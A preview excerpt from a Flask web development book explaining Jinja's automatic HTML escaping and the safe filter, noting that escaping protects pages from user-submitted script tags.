October 2018
Intermediate to advanced
332 pages
8h 9m
English
Content preview from Mastering Flask Web Development - Second Edition
Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
Start your free trial
The safe filter
If you try to insert HTML into your page from a variable—for example, when you wish to display a blog post—Jinja will automatically try to add HTML escape sequences to the output. Look at the following example:
{{ "<h1>Post Title</h1>" }}
<h1>Post Title</h1>
This is a necessary security feature. When an application has inputs that allow users to submit arbitrary text, it creates a vulnerability that a malicious user can use to input HTML code. For example, if a user were to submit a script tag as a comment and Jinja didn't have this feature, the script would be executed on all the browsers that visited the page.
However, we still need a way to display HTML that we know is safe to show, such as the HTML of our blog posts. ...